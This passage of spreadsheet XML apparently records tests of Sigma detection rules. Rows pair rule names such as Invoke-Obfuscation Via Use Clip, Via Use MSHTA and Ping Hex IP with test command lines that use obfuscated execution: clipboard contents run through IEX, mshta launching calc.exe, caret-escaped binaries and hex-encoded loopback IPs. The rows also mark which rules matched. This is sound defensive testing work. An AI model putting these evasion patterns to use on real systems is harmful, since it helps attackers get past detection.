          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J734" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K734" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="735" ht="15.75" customHeight="1" s="42">
      <c r="A735" s="43" t="n"/>
      <c r="B735" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C735" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D735" s="36" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E735" s="36" t="inlineStr">
        <is>
          <t>set a=1 &amp; set invoke=payload &amp; powershell -c "Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F735" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G735" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H735" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I735" s="43" t="n"/>
      <c r="J735" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K735" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="736" ht="15.75" customHeight="1" s="42">
      <c r="A736" s="43" t="n"/>
      <c r="B736" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C736" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D736" s="36" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E736" s="36" t="inlineStr">
        <is>
          <t>set a=1 &amp; set invoke=payload &amp; powershell -C "Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F736" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G736" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H736" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I736" s="43" t="n"/>
      <c r="J736" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K736" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="737" ht="15.75" customHeight="1" s="42">
      <c r="A737" s="43" t="n"/>
      <c r="B737" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C737" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D737" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E737" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo Write-Host 'Test' | c^l^i^p.exe &amp;&amp; powershell -c \"IEX ([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F737" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G737" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H737" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I737" s="36" t="n"/>
      <c r="J737" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K737" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="738" ht="15.75" customHeight="1" s="42">
      <c r="A738" s="43" t="n"/>
      <c r="B738" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C738" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D738" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E738" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo Write-Host 'Test' | clip &amp; powershell -c \"IEX ([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F738" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G738" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H738" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I738" s="43" t="n"/>
      <c r="J738" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K738" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="739" ht="15.75" customHeight="1" s="42">
      <c r="A739" s="43" t="n"/>
      <c r="B739" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C739" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D739" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E739" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F739" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G739" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H739" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I739" s="36" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J739" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K739" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="740" ht="15.75" customHeight="1" s="42">
      <c r="A740" s="43" t="n"/>
      <c r="B740" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C740" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D740" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E740" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMMAND "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F740" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G740" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H740" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I740" s="36" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J740" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K740" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="741" ht="15.75" customHeight="1" s="42">
      <c r="A741" s="43" t="n"/>
      <c r="B741" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C741" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D741" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E741" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F741" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G741" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H741" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I741" s="36" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J741" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K741" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="742" ht="15.75" customHeight="1" s="42">
      <c r="A742" s="43" t="n"/>
      <c r="B742" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C742" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D742" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E742" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMaND "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F742" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G742" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H742" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I742" s="36" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J742" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K742" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="743" ht="15.75" customHeight="1" s="42">
      <c r="A743" s="43" t="n"/>
      <c r="B743" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C743" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D743" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E743" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMMAnD "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F743" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G743" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H743" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I743" s="36" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J743" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K743" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="744" ht="15.75" customHeight="1" s="42">
      <c r="A744" s="43" t="n"/>
      <c r="B744" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C744" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D744" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E744" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmANd "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F744" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G744" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H744" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I744" s="36" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J744" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K744" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="745" ht="15.75" customHeight="1" s="42">
      <c r="A745" s="43" t="n"/>
      <c r="B745" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C745" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D745" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E745" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMMaND "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F745" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G745" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H745" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I745" s="36" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J745" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K745" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="746" ht="15.75" customHeight="1" s="42">
      <c r="A746" s="43" t="n"/>
      <c r="B746" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C746" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D746" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E746" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c echo Write-Host 'Bypass Test' | clip &amp; powershell -c IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F746" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G746" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H746" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I746" s="36" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J746" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K746" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="747" ht="15.75" customHeight="1" s="42">
      <c r="A747" s="43" t="n"/>
      <c r="B747" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C747" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D747" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E747" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c echo Write-Host "'Bypass Test'" | clip &amp; powershell -c IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F747" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G747" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H747" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I747" s="36" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J747" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K747" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="748" ht="15.75" customHeight="1" s="42">
      <c r="A748" s="43" t="n"/>
      <c r="B748" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C748" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D748" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E748" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" echo Write-Host "'Bypass Test'" | clip &amp; powershell /"c" IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F748" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G748" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H748" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I748" s="36" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J748" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K748" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="749" ht="15.75" customHeight="1" s="42">
      <c r="A749" s="43" t="n"/>
      <c r="B749" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C749" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D749" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E749" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" echo Write-Host "'Bypass Test'" | clip &amp; powershell -C IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F749" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G749" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H749" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I749" s="36" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J749" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K749" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="750" ht="15.75" customHeight="1" s="42">
      <c r="A750" s="43" t="n"/>
      <c r="B750" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C750" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D750" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E750" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C echo Write-Host "'Bypass Test'" | clip &amp; powershell /"c" IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F750" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G750" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H750" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I750" s="36" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J750" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K750" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="751" ht="15.75" customHeight="1" s="42">
      <c r="A751" s="43" t="n"/>
      <c r="B751" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C751" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D751" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E751" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" echo Write-Host "'Bypass Test'" | clip &amp; powershell -"c" IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F751" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G751" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H751" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I751" s="43" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J751" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K751" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="752" ht="15.75" customHeight="1" s="42">
      <c r="A752" s="43" t="n"/>
      <c r="B752" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C752" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D752" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E752" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C echo Write-Host "'Bypass Test'" | clip &amp; powershell -c IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F752" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G752" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H752" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I752" s="36" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J752" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K752" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="753" ht="15.75" customHeight="1" s="42">
      <c r="A753" s="43" t="n"/>
      <c r="B753" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C753" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D753" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E753" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c echo Write-Host "'Bypass Test'" | clip &amp; powershell -C IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F753" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G753" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H753" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I753" s="36" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J753" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K753" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="754" ht="15.75" customHeight="1" s="42">
      <c r="A754" s="43" t="n"/>
      <c r="B754" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta</t>
        </is>
      </c>
      <c r="C754" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use MSHTA</t>
        </is>
      </c>
      <c r="D754" s="36" t="inlineStr">
        <is>
          <t>ac20ae82-8758-4f38-958e-b44a3140ca88</t>
        </is>
      </c>
      <c r="E754" s="36" t="inlineStr">
        <is>
          <t>set a=calc.exe &amp; mshta vbscript:CreateObject("WScript.Shell").Exec("%a%")(window.close)</t>
        </is>
      </c>
      <c r="F754" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G754" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H754" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I754" s="43" t="inlineStr">
        <is>
          <t>MSHTA Execution with Suspicious File Extensions (cc7abbd0-762b-41e3-8a26-57ad50d2eea3)</t>
        </is>
      </c>
      <c r="J754" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K754" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="755" ht="15.75" customHeight="1" s="42">
      <c r="A755" s="43" t="n"/>
      <c r="B755" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta</t>
        </is>
      </c>
      <c r="C755" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use MSHTA</t>
        </is>
      </c>
      <c r="D755" s="36" t="inlineStr">
        <is>
          <t>ac20ae82-8758-4f38-958e-b44a3140ca88</t>
        </is>
      </c>
      <c r="E755" s="36" t="inlineStr">
        <is>
          <t>set a=calc.exe &amp;&amp; mshta javascript:a=new ActiveXObject("WScript.Shell");a.Run("%a%");window.close();</t>
        </is>
      </c>
      <c r="F755" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G755" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H755" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I755" s="4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J755" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K755" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="756" ht="15.75" customHeight="1" s="42">
      <c r="A756" s="43" t="n"/>
      <c r="B756" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta</t>
        </is>
      </c>
      <c r="C756" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use MSHTA</t>
        </is>
      </c>
      <c r="D756" s="36" t="inlineStr">
        <is>
          <t>ac20ae82-8758-4f38-958e-b44a3140ca88</t>
        </is>
      </c>
      <c r="E756" s="36" t="inlineStr">
        <is>
          <t>set a=1 &amp;&amp; m^shta vbscript:createobject("WScript.Shell").run("calc.exe")(window.close)</t>
        </is>
      </c>
      <c r="F756" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G756" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H756" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I756" s="4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756" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K756" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="757" ht="15.75" customHeight="1" s="42">
      <c r="A757" s="43" t="n"/>
      <c r="B757" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ping_hex_ip</t>
        </is>
      </c>
      <c r="C757" s="36" t="inlineStr">
        <is>
          <t>Ping Hex IP</t>
        </is>
      </c>
      <c r="D757" s="36" t="inlineStr">
        <is>
          <t>1a0d4aba-7668-4365-9ce4-6d79ab088dfd</t>
        </is>
      </c>
      <c r="E757" s="36" t="inlineStr">
        <is>
          <t>ping 0177.0000.0000.0001</t>
        </is>
      </c>
      <c r="F757" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G757" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H757" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I757" s="36" t="n"/>
      <c r="J757" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K757" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="758" ht="15.75" customHeight="1" s="42">
      <c r="A758" s="43" t="n"/>
      <c r="B758" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ping_hex_ip</t>
        </is>
      </c>
      <c r="C758" s="36" t="inlineStr">
        <is>
          <t>Ping Hex IP</t>
        </is>
      </c>
      <c r="D758" s="36" t="inlineStr">
        <is>
          <t>1a0d4aba-7668-4365-9ce4-6d79ab088dfd</t>
        </is>
      </c>
      <c r="E758" s="36" t="inlineStr">
        <is>
          <t>ping 2130706433</t>
        </is>
      </c>
      <c r="F758" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G758" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H758" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I758" s="43" t="inlineStr">
        <is>
          <t>Obfuscated IP Via CLI (56d19cb4-6414-4769-9644-1ed35ffbb148)</t>
        </is>
      </c>
      <c r="J758" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K758" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="759" ht="15.75" customHeight="1" s="42">
      <c r="A759" s="43" t="n"/>
      <c r="B759" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ping_hex_ip</t>
        </is>
      </c>
      <c r="C759" s="36" t="inlineStr">
        <is>
          <t>Ping Hex IP</t>
        </is>
      </c>
      <c r="D759" s="36" t="inlineStr">
        <is>
          <t>1a0d4aba-7668-4365-9ce4-6d79ab088dfd</t>
        </is>
      </c>
      <c r="E759" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\ping.exe C:\Windows\Temp\p.exe &amp;&amp; C:\Windows\Temp\p.exe 0x7f000001</t>
        </is>
      </c>
      <c r="F759" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G759" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H759" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I759" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J759" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K759" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="760" ht="15.75" customHeight="1" s="42">
      <c r="A760" s="43" t="n"/>
      <c r="B760" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
